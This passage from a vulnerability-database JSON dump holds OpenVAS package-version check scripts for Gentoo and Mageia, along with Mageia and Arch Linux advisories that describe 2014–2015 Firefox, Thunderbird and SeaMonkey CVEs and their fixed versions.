value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201504-01\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Firefox, Thunderbird, and SeaMonkey. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201504-01\");\n script_cve_id(\"CVE-2013-1741\", \"CVE-2013-2566\", \"CVE-2013-5590\", \"CVE-2013-5591\", \"CVE-2013-5592\", \"CVE-2013-5593\", \"CVE-2013-5595\", \"CVE-2013-5596\", \"CVE-2013-5597\", \"CVE-2013-5598\", \"CVE-2013-5599\", \"CVE-2013-5600\", \"CVE-2013-5601\", \"CVE-2013-5602\", \"CVE-2013-5603\", \"CVE-2013-5604\", \"CVE-2013-5605\", \"CVE-2013-5606\", \"CVE-2013-5607\", \"CVE-2013-5609\", \"CVE-2013-5610\", \"CVE-2013-5612\", \"CVE-2013-5613\", \"CVE-2013-5614\", \"CVE-2013-5615\", \"CVE-2013-5616\", \"CVE-2013-5618\", \"CVE-2013-5619\", \"CVE-2013-6671\", \"CVE-2013-6672\", \"CVE-2013-6673\", \"CVE-2014-1477\", \"CVE-2014-1478\", \"CVE-2014-1479\", \"CVE-2014-1480\", \"CVE-2014-1481\", \"CVE-2014-1482\", \"CVE-2014-1483\", \"CVE-2014-1485\", \"CVE-2014-1486\", \"CVE-2014-1487\", \"CVE-2014-1488\", \"CVE-2014-1489\", \"CVE-2014-1490\", \"CVE-2014-1491\", \"CVE-2014-1492\", \"CVE-2014-1493\", \"CVE-2014-1494\", \"CVE-2014-1496\", \"CVE-2014-1497\", \"CVE-2014-1498\", \"CVE-2014-1499\", \"CVE-2014-1500\", \"CVE-2014-1502\", \"CVE-2014-1504\", \"CVE-2014-1505\", \"CVE-2014-1508\", \"CVE-2014-1509\", \"CVE-2014-1510\", \"CVE-2014-1511\", \"CVE-2014-1512\", \"CVE-2014-1513\", \"CVE-2014-1514\", \"CVE-2014-1518\", \"CVE-2014-1519\", \"CVE-2014-1520\", \"CVE-2014-1522\", \"CVE-2014-1523\", \"CVE-2014-1524\", \"CVE-2014-1525\", \"CVE-2014-1526\", \"CVE-2014-1529\", \"CVE-2014-1530\", \"CVE-2014-1531\", \"CVE-2014-1532\", \"CVE-2014-1533\", \"CVE-2014-1534\", \"CVE-2014-1536\", \"CVE-2014-1537\", \"CVE-2014-1538\", \"CVE-2014-1539\", \"CVE-2014-1540\", \"CVE-2014-1541\", \"CVE-2014-1542\", \"CVE-2014-1543\", \"CVE-2014-1544\", \"CVE-2014-1545\", \"CVE-2014-1547\", \"CVE-2014-1548\", \"CVE-2014-1549\", \"CVE-2014-1550\", \"CVE-2014-1551\", \"CVE-2014-1552\", \"CVE-2014-1553\", \"CVE-2014-1554\", \"CVE-2014-1555\", \"CVE-2014-1556\", \"CVE-2014-1557\", \"CVE-2014-1558\", \"CVE-2014-1559\", \"CVE-2014-1560\", \"CVE-2014-1561\", \"CVE-2014-1562\", \"CVE-2014-1563\", \"CVE-2014-1564\", \"CVE-2014-1565\", \"CVE-2014-1566\", \"CVE-2014-1567\", \"CVE-2014-1568\", \"CVE-2014-1574\", \"CVE-2014-1575\", \"CVE-2014-1576\", \"CVE-2014-1577\", \"CVE-2014-1578\", \"CVE-2014-1580\", \"CVE-2014-1581\", \"CVE-2014-1582\", \"CVE-2014-1583\", \"CVE-2014-1584\", \"CVE-2014-1585\", \"CVE-2014-1586\", \"CVE-2014-1587\", \"CVE-2014-1588\", \"CVE-2014-1589\", \"CVE-2014-1590\", \"CVE-2014-1591\", \"CVE-2014-1592\", \"CVE-2014-1593\", \"CVE-2014-1594\", \"CVE-2014-5369\", \"CVE-2014-8631\", \"CVE-2014-8632\", \"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\", \"CVE-2014-8642\", \"CVE-2015-0817\", \"CVE-2015-0818\", \"CVE-2015-0819\", \"CVE-2015-0820\", \"CVE-2015-0821\", \"CVE-2015-0822\", \"CVE-2015-0823\", \"CVE-2015-0824\", \"CVE-2015-0825\", \"CVE-2015-0826\", \"CVE-2015-0827\", \"CVE-2015-0828\", \"CVE-2015-0829\", \"CVE-2015-0830\", \"CVE-2015-0831\", \"CVE-2015-0832\", \"CVE-2015-0833\", \"CVE-2015-0834\", \"CVE-2015-0835\", \"CVE-2015-0836\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201504-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/firefox\", unaffected: make_list(\"ge 31.5.3\"), vulnerable: make_list(\"lt 31.5.3\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/firefox-bin\", unaffected: make_list(\"ge 31.5.3\"), vulnerable: make_list(\"lt 31.5.3\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/thunderbird\", unaffected: make_list(\"ge 31.5.0\"), vulnerable: make_list(\"lt 31.5.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"mail-client/thunderbird-bin\", unaffected: make_list(\"ge 31.5.0\"), vulnerable: make_list(\"lt 31.5.0\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/seamonkey\", unaffected: make_list(\"ge 2.33.1\"), vulnerable: make_list(\"lt 2.33.1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-client/seamonkey-bin\", unaffected: make_list(\"ge 2.33.1\"), vulnerable: make_list(\"lt 2.33.1\"))) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-libs/nspr\", unaffected: make_list(\"ge 4.10.6\"), vulnerable: make_list(\"lt 4.10.6\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:02", "description": "Mageia Linux Local Security Checks mgasa-2015-0342", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0342", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0813", "CVE-2015-2713", "CVE-2015-0812", "CVE-2015-2717", "CVE-2015-0811", "CVE-2015-2712", "CVE-2015-2711", "CVE-2015-2716", "CVE-2015-0799", "CVE-2015-0808", "CVE-2015-2718", "CVE-2015-2710", "CVE-2015-0816", "CVE-2015-0818", "CVE-2015-0805", "CVE-2015-0802", "CVE-2015-0815", "CVE-2015-0807", "CVE-2015-2709", "CVE-2015-0804", "CVE-2015-2708", "CVE-2015-0801", "CVE-2014-8638", "CVE-2015-0803", "CVE-2015-0814", "CVE-2015-4496", "CVE-2015-0806", "CVE-2015-2706", "CVE-2015-2715"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130044", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130044", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0342.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130044\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:41:56 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0342\");\n script_tag(name:\"insight\", value:\"Updated iceape packages fix security issues.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0342.html\");\n script_cve_id(\"CVE-2015-0799\", \"CVE-2015-0801\", \"CVE-2015-0802\", \"CVE-2015-0803\", \"CVE-2015-0804\", \"CVE-2015-0805\", \"CVE-2015-0806\", \"CVE-2015-0807\", \"CVE-2015-0808\", \"CVE-2015-0811\", \"CVE-2015-0812\", \"CVE-2015-0813\", \"CVE-2015-0814\", \"CVE-2015-0815\", \"CVE-2015-0816\", \"CVE-2015-2706\", \"CVE-2015-2708\", \"CVE-2015-2709\", \"CVE-2015-2710\", \"CVE-2015-2711\", \"CVE-2015-2712\", \"CVE-2015-2713\", \"CVE-2015-2715\", \"CVE-2015-2716\", \"CVE-2015-2717\", \"CVE-2015-2718\", \"CVE-2015-4496\", \"CVE-2014-8638\", \"CVE-2015-0818\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0342\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"iceape\", rpm:\"iceape~2.35~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated iceape packages fix security issues: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors. (CVE-2014-8634) Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors. (CVE-2014-8635) Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not properly initialize memory for BMP images, which allows remote attackers to obtain sensitive information from process memory via a crafted web page that triggers the rendering of malformed BMP data within a CANVAS element. (CVE-2014-8637) The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site. (CVE-2014-8638) Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 do not properly interpret Set-Cookie headers within responses that have a 407 (aka Proxy Authentication Required) status code, which allows remote HTTP proxy servers to conduct session fixation attacks by providing a cookie name that corresponds to the session cookie of the origin server.(CVE-2014-8639) The mozilla::dom::AudioParamTimeline::AudioNodeInputValue function in the Web Audio API implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly restrict timeline operations, which allows remote attackers to cause a denial of service (uninitialized-memory read and application crash) via crafted API calls. (CVE-2014-8640) Use-after-free vulnerability in the WebRTC implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, and SeaMonkey before 2.32 allows remote attackers to execute arbitrary code via crafted track data. (CVE-2014-8641) Mozilla Firefox before 35.0 and SeaMonkey before 2.32 do not consider the id-pkix-ocsp-nocheck extension in deciding whether to trust an OCSP responder, which makes it easier for remote attackers to obtain sensitive information by sniffing the network during a session in which there was an incorrect decision to accept a compromised and revoked certificate. (CVE-2014-8642) The XrayWrapper implementation in Mozilla Firefox before 35.0 and SeaMonkey before 2.32 does not properly interact with a DOM object that has a named getter, which might allow remote attackers to execute arbitrary JavaScript code with chrome privileges via unspecified vectors. (CVE-2014-8636) \n", "cvss3": {}, "published": "2015-01-19T16:47:36", "type": "mageia", "title": "Updated iceape package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642"], "modified": "2015-01-19T16:47:36", "id": "MGASA-2015-0028", "href": "https://advisories.mageia.org/MGASA-2015-0028.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox or Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running it (CVE-2014-8634). It was found that the Beacon interface implementation in Firefox and Thunderbird did not follow the Cross-Origin Resource Sharing (CORS) specification. A web page containing malicious content could allow a remote attacker to conduct a Cross-Site Request Forgery (XSRF) attack (CVE-2014-8638). It was found that a Web Proxy returning a 407 Proxy Authentication response with a Set-Cookie header could inject cookies into the originally requested domain. This could be used for session-fixation attacks. This attack only allows cookies to be written but does not allow them to be read (CVE-2014-8639). Security researcher Mitchell Harper discovered a read-after-free in WebRTC due to the way tracks are handled. This results in a either a potentially exploitable crash or incorrect WebRTC behavior. Note that this issue only affects Firefox (CVE-2014-8641). \n", "cvss3": {}, "published": "2015-01-17T22:31:08", "type": "mageia", "title": "Updated firefox and thunderbird packages fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2015-01-17T22:31:08", "id": "MGASA-2015-0025", "href": "https://advisories.mageia.org/MGASA-2015-0025.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated iceape packages fix security issues: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors. (CVE-2015-0814, CVE-2015-0815) Use-after-free vulnerability in the AppendElements function in Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 on Linux, when the Fluendo MP3 plugin for GStreamer is used, allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted MP3 file. (CVE-2015-0813) Mozilla Firefox before 37.0 does not require an HTTPS session for lightweight theme add-on installations, which allows man-in-the-middle attackers to bypass an intended user-confirmation requirement by deploying a crafted web site and conducting a DNS spoofing attack against a mozilla.org subdomain. (CVE-2015-0812) Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 do not properly restrict resource: URLs, which makes it easier for remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging the ability to bypass the Same Origin Policy, as demonstrated by the resource: URL associated with PDF.js. (CVE-2015-0816) The QCMS implementation in Mozilla Firefox before 37.0 allows remote attackers to obtain sensitive information from process heap memory or cause a denial of service (out-of-bounds read) via an image that is improperly handled during transformation. (CVE-2015-0811) The webrtc::VPMContentAnalysis::Release function in the WebRTC implementation in Mozilla Firefox before 37.0 uses incompatible approaches to the deallocation of memory for simple-type arrays, which might allow remote attackers to cause a denial of service (memory corruption) via unspecified vectors. (CVE-2015-0808) The navigator.sendBeacon implementation in Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 processes HTTP 30x status codes for redirects after a preflight request has occurred, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site, a similar issue to CVE-2014-8638. (CVE-2015-0807) The Off Main Thread Compositing (OMTC) implementation in Mozilla Firefox before 37.0 makes an incorrect memset call during interaction with the mozilla::layers::BufferTextureClient::AllocateForSurface function, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors that trigger rendering of 2D graphics content. (CVE-2015-0805) The Off Main Thread Compositing (OMTC) implementation in Mozilla Firefox before 37.0 attempts to use memset for a memory region of negative length during interaction with the mozilla::layers::BufferTextureClient::AllocateForSurface function, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors that trigger rendering of 2D graphics content. (CVE-2015-0806) The HTMLSourceElement::AfterSetAttr function in Mozilla Firefox before 37.0 does not properly constrain the original data type of a casted value during the setting of a SOURCE element's attributes, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via a crafted HTML document. (CVE-2015-0803) The HTMLSourceElement::BindToTree function in Mozilla Firefox before 37.0 does not properly constrain a data type after omitting namespace validation during certain tree-binding operations, which allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via a crafted HTML document containing a SOURCE element. (CVE-2015-0804) Mozilla Firefox before 37.0, Firefox ESR 31.x before 31.6, and Thunderbird before 31.6 allow remote attackers to bypass the Same Origin Policy and execute arbitrary JavaScript code with chrome privileges via vectors involving anchor navigation, a similar issue to CVE-2015-0818. (CVE-2015-0801) Mozilla Firefox before 37.0 relies on docshell type information instead of page principal information for Window.webidl access control, which might allow remote attackers to execute arbitrary JavaScript code with chrome privileges via certain content navigation that leverages the reachability of a privileged window with an unintended persistence of access to restricted internal methods. (CVE-2015-0802) The HTTP Alternative Services feature in Mozilla Firefox before 37.0.1 allows man-in-the-middle attackers to bypass an intended X.509 certificate-verification step for an SSL server by specifying that server in the uri-host field of an Alt-Svc HTTP/2 response header. (CVE-2015-0799) Race condition in the AsyncPaintWaitEvent::AsyncPaintWaitEvent function in Mozilla Firefox before 37.0.2 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via a crafted plugin that does not properly complete initialization. (CVE-2015-2706) Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors. (CVE-2015-2708) Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 38.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors. (CVE-2015-2709) Heap-based buffer overflow in the SVGTextFrame class in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code via crafted SVG graphics data in conjunction with a crafted Cascading Style Sheets (CSS) token sequence. (CVE-2015-2710) Mozilla Firefox before 38.0 does not recognize a referrer policy delivered by a referrer META element in cases of context-menu navigation and middle-click navigation, which allows remote attackers to obtain sensitive information by reading web-server Referer logs that contain private data in a URL, as demonstrated by a private path component. (CVE-2015-2711) The asm.js implementation in Mozilla Firefox before 38.0 does not properly determine heap lengths during identification of cases in which bounds checking may be safely skipped, which allows remote attackers to trigger out-of-bounds write operations and possibly execute arbitrary code, or trigger out-of-bounds read operations and possibly obtain sensitive information from process memory, via crafted JavaScript. (CVE-2015-2712) Use-after-free vulnerability in the SetBreaks function in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a document containing crafted text in conjunction with a Cascading Style Sheets (CSS) token sequence containing properties related to vertical text. (CVE-2015-2713) Race condition in the nsThreadManager::RegisterCurrentThread function in Mozilla Firefox before 38.0 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free and heap memory corruption) by leveraging improper Media Decoder Thread creation at the time of a shutdown. (CVE-2015-2715) Buffer overflow in the XML parser in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code by providing a large amount of compressed XML data. (CVE-2015-2716) Integer overflow in libstagefright in Mozilla Firefox before 38.0 allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow and out-of-bounds read) via an MP4 video file containing invalid metadata. (CVE-2015-2717) The WebChannel.jsm module in Mozilla Firefox before 38.0 allows remote attackers to bypass the Same Origin Policy and obtain sensitive webchannel-response data via a crafted web site containing an IFRAME element referencing a different web site that is intended to read this data. (CVE-2015-2718) Multiple integer overflows in libstagefright in Mozilla Firefox before 38.0 allow remote attackers to execute arbitrary code via crafted sample metadata in an MPEG-4 video file. (CVE-2015-4496) \n", "cvss3": {}, "published": "2015-09-08T07:20:40", "type": "mageia", "title": "Updated iceape packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8638", "CVE-2015-0799", "CVE-2015-0801", "CVE-2015-0802", "CVE-2015-0803", "CVE-2015-0804", "CVE-2015-0805", "CVE-2015-0806", "CVE-2015-0807", "CVE-2015-0808", "CVE-2015-0811", "CVE-2015-0812", "CVE-2015-0813", "CVE-2015-0814", "CVE-2015-0815", "CVE-2015-0816", "CVE-2015-0818", "CVE-2015-2706", "CVE-2015-2708", "CVE-2015-2709", "CVE-2015-2710", "CVE-2015-2711", "CVE-2015-2712", "CVE-2015-2713", "CVE-2015-2715", "CVE-2015-2716", "CVE-2015-2717", "CVE-2015-2718", "CVE-2015-4496"], "modified": "2015-09-08T07:20:40", "id": "MGASA-2015-0342", "href": "https://advisories.mageia.org/MGASA-2015-0342.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2014-8634 (arbitrary remote code execution)\n\nChristian Holler and Patrick McManus reported memory safety problems and\ncrashes that affect Firefox ESR 31.3 and Firefox 34.\n\n- CVE-2014-8635 (arbitrary remote code execution)\n\nChristoph Diehl, Christian Holler, Gary Kwong, Jesse Ruderman, Byron\nCampen, Terrence Cole, and Nils Ohlmeier reported memory safety problems\nand crashes that affect Firefox 34.\n\n- CVE-2014-8636 (arbitrary javascript code execution, privilege escalation)\n\nMozilla developer Bobby Holley reported that Document Object Model (DOM)\nobjects with some specific properties can bypass XrayWrappers. This can\nallow web content to confuse privileged code, potentially enabling\nprivilege escalation.\n\n- CVE-2014-8637 (information leakage)\n\nGoogle security researcher Michal Zalewski reported that when a\nmalformed bitmap image is rendered by the bitmap decoder within a\n<canvas> element, memory may not always be properly initialized. The\nresulting image then uses this uninitialized memory during rendering,\nallowing data to potentially leak to web content.\n\n- CVE-2014-8638 (XSRF)\n\nSecurity researcher Muneaki Nishimura reported that\nnavigator.sendBeacon() does not follow the cross-origin resource sharing\n(CORS) specification. This results in the request from sendBeacon()\nlacking an origin header in violation of the W3C Beacon specification\nand not being treated as a CORS request. This allows for a potential\nCross-site request forgery (XSRF) attack from malicious websites.\n\n- CVE-2014-8639 (cookie injection)\n\nSecurity researcher Xiaofeng Zheng of the Blue Lotus Team at Tsinghua\nUniversity reported reported that a Web Proxy returning a 407 Proxy\nAuthentication response with a Set-Cookie header could inject cookies\ninto the originally requested domain. This could be used for\nsession-fixation attacks. This attack only allows cookies to be written\nbut does not allow them to be read.\n\n- CVE-2014-8640 (denial of service)\n\nSecurity researcher Holger Fuhrmannek used the used the Address\nSanitizer tool to discover a crash in Web Audio while manipulating\ntimelines. This allowed for the a small block of memory with an\nuninitialized pointer to be read. The crash is not exploitable.\n\n- CVE-2014-8641 (remote code execution)\n\nSecurity researcher Mitchell Harper discovered a read-after-free in\nWebRTC due to the way tracks are handled. This results in a either a\npotentially exploitable crash or incorrect WebRTC behavior.\n\n- CVE-2014-8642 (OCSP bypass)\n\nBrian Smith reported that delegated Online Certificate Status Protocol\n(OCSP) responder certificates fail to recognize the id-pkix-ocsp-nocheck\nextension. If this extension is present in a delegated OCSP response\nsigning certificate, it will be discarded if it is signed by such a\ncertificate. This could result in a user connecting to a site with a\nrevoked certificate.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "archlinux", "title": "firefox: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-14T00:00:00", "id": "ASA-201501-6", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000202.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:41", "description": "- CVE-2014-8634 (arbitrary remote code execution)\n\nChristian Holler and Patrick McManus reported memory safety problems and\ncrashes that affect Firefox ESR 31.3 and Firefox 34.\n\n- CVE-2014-8635 (arbitrary remote code execution)\n\nChristoph Diehl, Christian Holler, Gary Kwong, Jesse Ruderman, Byron\nCampen, Terrence Cole, and Nils Ohlmeier reported memory safety problems\nand crashes that affect Firefox 34.\n\n- CVE-2014-8638 (XSRF)\n\nSecurity researcher Muneaki Nishimura reported that\nnavigator.sendBeacon() does not follow the cross-origin resource sharing\n(CORS) specification. This results in the request from sendBeacon()\nlacking an origin header in violation of the W3C Beacon specification\nand not being treated as a CORS request. This allows for a potential\nCross-site request forgery (XSRF) attack from malicious websites.\n\n- CVE-2014-8639 (cookie injection)\n\nSecurity researcher Xiaofeng Zheng of the Blue Lotus Team at Tsinghua\nUniversity reported reported that a Web Proxy returning a 407 Proxy\nAuthentication response with a Set-Cookie header could inject cookies\ninto the originally requested domain. This could be used for\nsession-fixation attacks. This attack only allows cookies to be written\nbut does not allow them to be read.", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "archlinux", "title": "thunderbird: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 